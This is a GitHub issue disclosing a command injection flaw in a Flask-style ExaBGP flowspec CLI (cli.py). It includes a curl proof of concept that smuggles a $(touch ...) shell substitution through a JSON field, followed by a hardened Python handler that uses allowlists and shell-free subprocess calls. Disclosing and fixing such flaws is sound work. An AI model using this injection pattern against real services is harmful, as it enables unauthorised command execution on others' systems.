BSpendlove / flowspec-v4-example

Flowspec v4 example with ExaBGP

cli.py: command injection vulnerability #1

Open networkhorse opened 3 years ago

networkhorse commented 3 years ago

Hi there,

Your cli.py is vulnerable to command injection as displayed below:

The original state:

/exabgp # ls
Dockerfile  cli.py  entrypoint.sh  exabgp.conf  requirements.txt

The injection:

curl -X POST -H 'Content-Type: application/json' --data "{\"neighbor\": \"blah\", \"command\": \"';"'$(touch /exabgp/test.txtbroken)'"'\"}" http://127.0.0.1:5001/exabgp/cli/announce/flowspec
{
  "error": false,
  "stdout": "b'command: neighbor blah\\n'"
}

And finally:

/exabgp # ls
Dockerfile  cli.py  entrypoint.sh  exabgp.conf  requirements.txt  test.txtbroken

Perhaps consider sanitising input.

Thanks!
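
A constructed hardened handler, added here as an illustration and not code from the repository's cli.py (which is not shown in the issue): the request fields are checked against an allowlist and the ExaBGP command is passed as an argument list with no shell, so the payload above is refused before any process is started. It assumes an `exabgpcli` binary on PATH that takes the command words as separate arguments.

```python
import re
import subprocess

# Constructed example, not the project's cli.py. Assumes ExaBGP's "exabgpcli"
# is on PATH and accepts "neighbor <ip> announce flowspec <route words...>".
NEIGHBOR_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")  # IPv4 neighbor only
# Allowlist for the flowspec route text: word characters, whitespace and the
# punctuation the route grammar uses. Quotes, $, backticks, (), |, & and
# newlines are outside it, so the string from the report never reaches exec.
COMMAND_RE = re.compile(r"^[A-Za-z0-9_ ./:;{}=\-]+$")


def validate(neighbor, command):
    """Return None when both fields are acceptable, otherwise an error message."""
    if not NEIGHBOR_RE.match(neighbor or ""):
        return "neighbor must be an IPv4 address"
    if not COMMAND_RE.match(command or ""):
        return "command contains characters outside the allowed set"
    return None


def build_argv(neighbor, command):
    """Build the argument vector as a list; no shell ever parses it."""
    return ["exabgpcli", "neighbor", neighbor, "announce", "flowspec", *command.split()]


def run_argv(argv):
    # shell=False (the default): argv goes straight to execve, so there is no
    # word splitting, no $(...) substitution and no quote processing.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return proc.stdout


def announce_flowspec(payload, runner=run_argv):
    """Handler returning the {"error": ..., "stdout": ...} shape seen in the report."""
    neighbor = payload.get("neighbor", "")
    command = payload.get("command", "")
    err = validate(neighbor, command)
    if err:
        return {"error": True, "stdout": err}
    return {"error": False, "stdout": runner(build_argv(neighbor, command))}
```

Even without the allowlist, the list form of `subprocess.run` is what removes the injection; the validation is defence in depth and produces a useful error instead of an ExaBGP parse failure.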

BSpendlove commented 3 years ago

edit: I mean thank you for submitting an issue.

Please be aware that during these covid times, response times may be slow. Please allow 24-48 hours for any issues to be reviewed and/or resolved.